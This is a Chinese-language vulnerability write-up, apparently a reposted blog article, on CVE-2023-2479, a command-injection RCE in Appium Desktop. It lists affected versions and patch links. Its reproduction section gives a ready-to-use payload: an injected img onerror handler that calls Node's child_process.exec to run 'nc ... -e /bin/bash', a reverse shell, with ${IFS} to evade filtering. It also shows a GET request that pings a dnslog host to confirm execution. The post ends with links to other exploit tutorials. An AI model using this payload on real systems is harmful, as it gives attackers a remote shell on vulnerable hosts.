CVE-2023-2479 RCE漏洞(附EXP)
2023-11-22 16:50:44 Author: 渗透Xiao白帽(查看原文) 阅读量:134 收藏

网安引领时代,弥天点亮未来   

0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Appium Desktop是Appium公司的Appium Server的图形化界面。

Appium Desktop v1.22.3-4之前版本存在操作系统命令注入漏洞。攻击者利用该漏洞执行操作系统命令注入攻击。

0x02影响版本

Appium Desktop v1.22.3-4之前版本

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (GET)

?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>

漏洞复现

        GET请求

GET /?url=<img/src="http://nbjfpetfmu.dgrh3.cn"> HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

   测试dnslog命令执行成功

解析记录

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fehttps://security.snyk.io/vuln/SNYK-JS-APPIUMDESKTOP-5491470

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

往期推荐 · 有彩蛋

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗

往期文章有彩蛋哦


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247500165&idx=1&sn=2e27bdd68498b54f5a5d99bd29563140&chksm=ea343edfdd43b7c958fed1b198d795619295e612ca32f3f5cf9a489a0c519db43b11fd4a5582&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh